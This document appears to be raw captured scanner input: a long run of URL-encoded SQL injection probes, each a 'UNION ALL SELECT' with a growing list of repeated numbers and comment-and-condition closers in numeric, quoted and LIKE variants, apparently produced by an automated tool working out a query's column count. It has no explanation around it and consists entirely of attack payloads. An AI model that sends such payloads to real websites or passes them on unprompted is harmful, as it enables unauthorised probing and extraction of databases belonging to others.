-8638%29%20UNION%20ALL%20SELECT%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401%2C%209401--%20%20AND%20%281831%3D1831 -2173%29%20UNION%20ALL%20SELECT%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553%2C%205553--%20%20AND%20%287222%3D7222 -6511%29%20UNION%20ALL%20SELECT%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532--%20%20AND%20%288092%3D8092 -3139%29%20UNION%20ALL%20SELECT%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144%2C%202144--%20%20AND%20%285879%3D5879 -5605%29%20UNION%20ALL%20SELECT%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643%2C%208643--%20%20AND%20%282327%3D2327 -7009%29%20UNION%20ALL%20SELECT%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113--%20%20AND%20%281045%3D1045 -4088%29%20UNION%20ALL%20SELECT%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808--%20%20AND%20%288640%3D8640 -1808%29%29%20UNION%20ALL%20SELECT%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130%2C%201130--%20%20AND%20%28%287544%3D7544 -5182%29%29%20UNION%20ALL%20SELECT%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143--%20%20AND%20%28%289061%3D9061 -2787%29%29%20UNION%20ALL%20SELECT%204844%2C%204844%2C%204844%2C%204844%2C%204844%2C%204844%2C%204844%2C%204844%2C%204844%2C%204844%2C%204844%2C%204844%2C%204844--%20%20AND%20%28%287914%3D7914 -1557%29%29%20UNION%20ALL%20SELECT%203237%2C%203237%2C%203237%2C%203237%2C%203237%2C%203237%2C%203237%2C%203237%2C%203237%2C%203237%2C%203237%2C%203237%2C%203237%2C%203237--%20%20AND%20%28%285362%3D5362 -9466%29%29%20UNION%20ALL%20SELECT%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708%2C%207708--%20%20AND%20%28%282281%3D2281 -6365%29%29%20UNION%20ALL%20SELECT%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271%2C%202271--%20%20AND%20%28%288985%3D8985 -1746%29%29%20UNION%20ALL%20SELECT%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918%2C%206918--%20%20AND%20%28%287446%3D7446 -3025%29%29%20UNION%20ALL%20SELECT%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595%2C%204595--%20%20AND%20%28%288972%3D8972 -3750%29%29%20UNION%20ALL%20SELECT%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808%2C%203808--%20%20AND%20%28%284707%3D4707 -1001%29%29%20UNION%20ALL%20SELECT%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155--%20%20AND%20%28%283856%3D3856 -6498%29%29%29%20UNION%20ALL%20SELECT%202654%2C%202654%2C%202654%2C%202654%2C%202654%2C%202654%2C%202654%2C%202654%2C%202654%2C%202654%2C%202654--%20%20AND%20%28%28%288733%3D8733 -7924%29%29%29%20UNION%20ALL%20SELECT%202257%2C%202257%2C%202257%2C%202257%2C%202257%2C%202257%2C%202257%2C%202257%2C%202257%2C%202257%2C%202257%2C%202257--%20%20AND%20%28%28%285727%3D5727 -7793%29%29%29%20UNION%20ALL%20SELECT%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385--%20%20AND%20%28%28%283493%3D3493 -4653%29%29%29%20UNION%20ALL%20SELECT%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535--%20%20AND%20%28%28%288411%3D8411 -1931%29%29%29%20UNION%20ALL%20SELECT%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686--%20%20AND%20%28%28%284145%3D4145 -5856%29%29%29%20UNION%20ALL%20SELECT%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758%2C%203758--%20%20AND%20%28%28%288340%3D8340 -5046%29%29%29%20UNION%20ALL%20SELECT%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925%2C%203925--%20%20AND%20%28%28%282402%3D2402 -9010%29%29%29%20UNION%20ALL%20SELECT%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279--%20%20AND%20%28%28%289005%3D9005 -9394%29%29%29%20UNION%20ALL%20SELECT%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745%2C%202745--%20%20AND%20%28%28%287350%3D7350 -4889%29%29%29%20UNION%20ALL%20SELECT%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065%2C%209065--%20%20AND%20%28%28%281495%3D1495 -5519%20UNION%20ALL%20SELECT%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031%2C%202031--%20 -5499%20UNION%20ALL%20SELECT%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857--%20 -7345%20UNION%20ALL%20SELECT%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561--%20 -1736%20UNION%20ALL%20SELECT%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542%2C%202542--%20 -8042%20UNION%20ALL%20SELECT%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784--%20 -2635%20UNION%20ALL%20SELECT%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591%2C%202591--%20 -2568%20UNION%20ALL%20SELECT%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743--%20 -9441%20UNION%20ALL%20SELECT%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579--%20 -6633%20UNION%20ALL%20SELECT%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992--%20 -4605%20UNION%20ALL%20SELECT%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166%2C%207166--%20 -1283%27%29%20UNION%20ALL%20SELECT%206813%2C%206813%2C%206813%2C%206813%2C%206813%2C%206813%2C%206813%2C%206813%2C%206813%2C%206813%2C%206813--%20%20AND%20%28%27xzxo%27%3D%27xzxo -3338%27%29%20UNION%20ALL%20SELECT%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798%2C%205798--%20%20AND%20%28%27SkjX%27%3D%27SkjX -2741%27%29%20UNION%20ALL%20SELECT%205088%2C%205088%2C%205088%2C%205088%2C%205088%2C%205088%2C%205088%2C%205088%2C%205088%2C%205088%2C%205088%2C%205088%2C%205088--%20%20AND%20%28%27bSHY%27%3D%27bSHY -1721%27%29%20UNION%20ALL%20SELECT%208617%2C%208617%2C%208617%2C%208617%2C%208617%2C%208617%2C%208617%2C%208617%2C%208617%2C%208617%2C%208617%2C%208617%2C%208617%2C%208617--%20%20AND%20%28%27zffP%27%3D%27zffP -8672%27%29%20UNION%20ALL%20SELECT%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922%2C%209922--%20%20AND%20%28%27IZkd%27%3D%27IZkd -5562%27%29%20UNION%20ALL%20SELECT%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653--%20%20AND%20%28%27DacH%27%3D%27DacH -8596%27%29%20UNION%20ALL%20SELECT%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908--%20%20AND%20%28%27PrRW%27%3D%27PrRW -1723%27%29%20UNION%20ALL%20SELECT%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800%2C%207800--%20%20AND%20%28%27xYMN%27%3D%27xYMN -9590%27%29%20UNION%20ALL%20SELECT%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104--%20%20AND%20%28%27eVoc%27%3D%27eVoc -6423%27%29%20UNION%20ALL%20SELECT%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782--%20%20AND%20%28%27WzHm%27%3D%27WzHm -6498%27%29%29%20UNION%20ALL%20SELECT%208880%2C%208880%2C%208880%2C%208880%2C%208880%2C%208880%2C%208880%2C%208880%2C%208880%2C%208880%2C%208880--%20%20AND%20%28%28%27wYmu%27%3D%27wYmu -1745%27%29%29%20UNION%20ALL%20SELECT%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900%2C%201900--%20%20AND%20%28%28%27PzZD%27%3D%27PzZD -1304%27%29%29%20UNION%20ALL%20SELECT%202091%2C%202091%2C%202091%2C%202091%2C%202091%2C%202091%2C%202091%2C%202091%2C%202091%2C%202091%2C%202091%2C%202091%2C%202091--%20%20AND%20%28%28%27JGfm%27%3D%27JGfm -2456%27%29%29%20UNION%20ALL%20SELECT%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481--%20%20AND%20%28%28%27jfIs%27%3D%27jfIs -7497%27%29%29%20UNION%20ALL%20SELECT%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531--%20%20AND%20%28%28%27ZcSc%27%3D%27ZcSc -3395%27%29%29%20UNION%20ALL%20SELECT%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876%2C%201876--%20%20AND%20%28%28%27ipkD%27%3D%27ipkD -1571%27%29%29%20UNION%20ALL%20SELECT%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336%2C%208336--%20%20AND%20%28%28%27uaFQ%27%3D%27uaFQ -9464%27%29%29%20UNION%20ALL%20SELECT%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729%2C%201729--%20%20AND%20%28%28%27iuOg%27%3D%27iuOg -5599%27%29%29%20UNION%20ALL%20SELECT%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743%2C%207743--%20%20AND%20%28%28%27EUpz%27%3D%27EUpz -5441%27%29%29%20UNION%20ALL%20SELECT%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268--%20%20AND%20%28%28%27zkUY%27%3D%27zkUY -8287%27%29%29%29%20UNION%20ALL%20SELECT%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918%2C%202918--%20%20AND%20%28%28%28%27JQEC%27%3D%27JQEC -3881%27%29%29%29%20UNION%20ALL%20SELECT%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582--%20%20AND%20%28%28%28%27yORU%27%3D%27yORU -3816%27%29%29%29%20UNION%20ALL%20SELECT%204702%2C%204702%2C%204702%2C%204702%2C%204702%2C%204702%2C%204702%2C%204702%2C%204702%2C%204702%2C%204702%2C%204702%2C%204702--%20%20AND%20%28%28%28%27cnSD%27%3D%27cnSD -8141%27%29%29%29%20UNION%20ALL%20SELECT%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723--%20%20AND%20%28%28%28%27YijR%27%3D%27YijR -6874%27%29%29%29%20UNION%20ALL%20SELECT%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765--%20%20AND%20%28%28%28%27MIhk%27%3D%27MIhk -4795%27%29%29%29%20UNION%20ALL%20SELECT%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958--%20%20AND%20%28%28%28%27dvuY%27%3D%27dvuY -4052%27%29%29%29%20UNION%20ALL%20SELECT%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169%2C%203169--%20%20AND%20%28%28%28%27ByLb%27%3D%27ByLb -5582%27%29%29%29%20UNION%20ALL%20SELECT%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797--%20%20AND%20%28%28%28%27VKfR%27%3D%27VKfR -3285%27%29%29%29%20UNION%20ALL%20SELECT%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387%2C%208387--%20%20AND%20%28%28%28%27CtlI%27%3D%27CtlI -4765%27%29%29%29%20UNION%20ALL%20SELECT%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997--%20%20AND%20%28%28%28%27ppNB%27%3D%27ppNB -9831%27%20UNION%20ALL%20SELECT%209918%2C%209918%2C%209918%2C%209918%2C%209918%2C%209918%2C%209918%2C%209918%2C%209918%2C%209918%2C%209918--%20%20AND%20%27GJcY%27%3D%27GJcY -7764%27%20UNION%20ALL%20SELECT%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198--%20%20AND%20%27XhBV%27%3D%27XhBV -2559%27%20UNION%20ALL%20SELECT%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804--%20%20AND%20%27UXer%27%3D%27UXer -6309%27%20UNION%20ALL%20SELECT%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942--%20%20AND%20%27Yfok%27%3D%27Yfok -5787%27%20UNION%20ALL%20SELECT%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777%2C%205777--%20%20AND%20%27LdzD%27%3D%27LdzD -2077%27%20UNION%20ALL%20SELECT%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125%2C%204125--%20%20AND%20%27YeOJ%27%3D%27YeOJ -2994%27%20UNION%20ALL%20SELECT%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689%2C%208689--%20%20AND%20%27FCgA%27%3D%27FCgA -2294%27%20UNION%20ALL%20SELECT%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779--%20%20AND%20%27sSEj%27%3D%27sSEj -3671%27%20UNION%20ALL%20SELECT%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563%2C%204563--%20%20AND%20%27Bsdx%27%3D%27Bsdx -8569%27%20UNION%20ALL%20SELECT%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477%2C%205477--%20%20AND%20%27pNyW%27%3D%27pNyW -2634%27%29%20UNION%20ALL%20SELECT%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038--%20%20AND%20%28%27TphZ%27%20LIKE%20%27TphZ -1749%27%29%20UNION%20ALL%20SELECT%201560%2C%201560%2C%201560%2C%201560%2C%201560%2C%201560%2C%201560%2C%201560%2C%201560%2C%201560%2C%201560%2C%201560--%20%20AND%20%28%27dPoM%27%20LIKE%20%27dPoM -3322%27%29%20UNION%20ALL%20SELECT%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965%2C%206965--%20%20AND%20%28%27RNXF%27%20LIKE%20%27RNXF -4822%27%29%20UNION%20ALL%20SELECT%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452--%20%20AND%20%28%27AVlE%27%20LIKE%20%27AVlE -4873%27%29%20UNION%20ALL%20SELECT%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716--%20%20AND%20%28%27pJap%27%20LIKE%20%27pJap -8269%27%29%20UNION%20ALL%20SELECT%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867--%20%20AND%20%28%27NGXC%27%20LIKE%20%27NGXC -8592%27%29%20UNION%20ALL%20SELECT%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616%2C%201616--%20%20AND%20%28%27IJvf%27%20LIKE%20%27IJvf -8306%27%29%20UNION%20ALL%20SELECT%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550--%20%20AND%20%28%27ARFV%27%20LIKE%20%27ARFV -7698%27%29%20UNION%20ALL%20SELECT%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584%2C%203584--%20%20AND%20%28%27DiiZ%27%20LIKE%20%27DiiZ -8275%27%29%20UNION%20ALL%20SELECT%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048%2C%203048--%20%20AND%20%28%27EWbN%27%20LIKE%20%27EWbN -9115%27%29%29%20UNION%20ALL%20SELECT%208517%2C%208517%2C%208517%2C%208517%2C%208517%2C%208517%2C%208517%2C%208517%2C%208517%2C%208517%2C%208517--%20%20AND%20%28%28%27rbIE%27%20LIKE%20%27rbIE -9499%27%29%29%20UNION%20ALL%20SELECT%207168%2C%207168%2C%207168%2C%207168%2C%207168%2C%207168%2C%207168%2C%207168%2C%207168%2C%207168%2C%207168%2C%207168--%20%20AND%20%28%28%27SfSN%27%20LIKE%20%27SfSN -3752%27%29%29%20UNION%20ALL%20SELECT%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716--%20%20AND%20%28%28%27wJcj%27%20LIKE%20%27wJcj -4197%27%29%29%20UNION%20ALL%20SELECT%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763%2C%209763--%20%20AND%20%28%28%27HsPB%27%20LIKE%20%27HsPB -3155%27%29%29%20UNION%20ALL%20SELECT%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126%2C%203126--%20%20AND%20%28%28%27aPXU%27%20LIKE%20%27aPXU -9607%27%29%29%20UNION%20ALL%20SELECT%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994%2C%205994--%20%20AND%20%28%28%27TQHH%27%20LIKE%20%27TQHH -4223%27%29%29%20UNION%20ALL%20SELECT%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658--%20%20AND%20%28%28%27UbPW%27%20LIKE%20%27UbPW -1468%27%29%29%20UNION%20ALL%20SELECT%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690%2C%205690--%20%20AND%20%28%28%27sjZC%27%20LIKE%20%27sjZC -5127%27%29%29%20UNION%20ALL%20SELECT%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642%2C%209642--%20%20AND%20%28%28%27GHNv%27%20LIKE%20%27GHNv -5118%27%29%29%20UNION%20ALL%20SELECT%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485%2C%209485--%20%20AND%20%28%28%27nCIC%27%20LIKE%20%27nCIC -5631%27%29%29%29%20UNION%20ALL%20SELECT%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829--%20%20AND%20%28%28%28%27eWqk%27%20LIKE%20%27eWqk -5790%27%29%29%29%20UNION%20ALL%20SELECT%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227--%20%20AND%20%28%28%28%27vPRv%27%20LIKE%20%27vPRv -8782%27%29%29%29%20UNION%20ALL%20SELECT%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577--%20%20AND%20%28%28%28%27jzuu%27%20LIKE%20%27jzuu -1110%27%29%29%29%20UNION%20ALL%20SELECT%208999%2C%208999%2C%208999%2C%208999%2C%208999%2C%208999%2C%208999%2C%208999%2C%208999%2C%208999%2C%208999%2C%208999%2C%208999%2C%208999--%20%20AND%20%28%28%28%27MHML%27%20LIKE%20%27MHML -1394%27%29%29%29%20UNION%20ALL%20SELECT%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509--%20%20AND%20%28%28%28%27THde%27%20LIKE%20%27THde -8638%27%29%29%29%20UNION%20ALL%20SELECT%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172%2C%203172--%20%20AND%20%28%28%28%27zyYs%27%20LIKE%20%27zyYs -3496%27%29%29%29%20UNION%20ALL%20SELECT%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010%2C%204010--%20%20AND%20%28%28%28%27wdKn%27%20LIKE%20%27wdKn -2965%27%29%29%29%20UNION%20ALL%20SELECT%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480%2C%208480--%20%20AND%20%28%28%28%27rJie%27%20LIKE%20%27rJie -6646%27%29%29%29%20UNION%20ALL%20SELECT%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509--%20%20AND%20%28%28%28%27MThJ%27%20LIKE%20%27MThJ 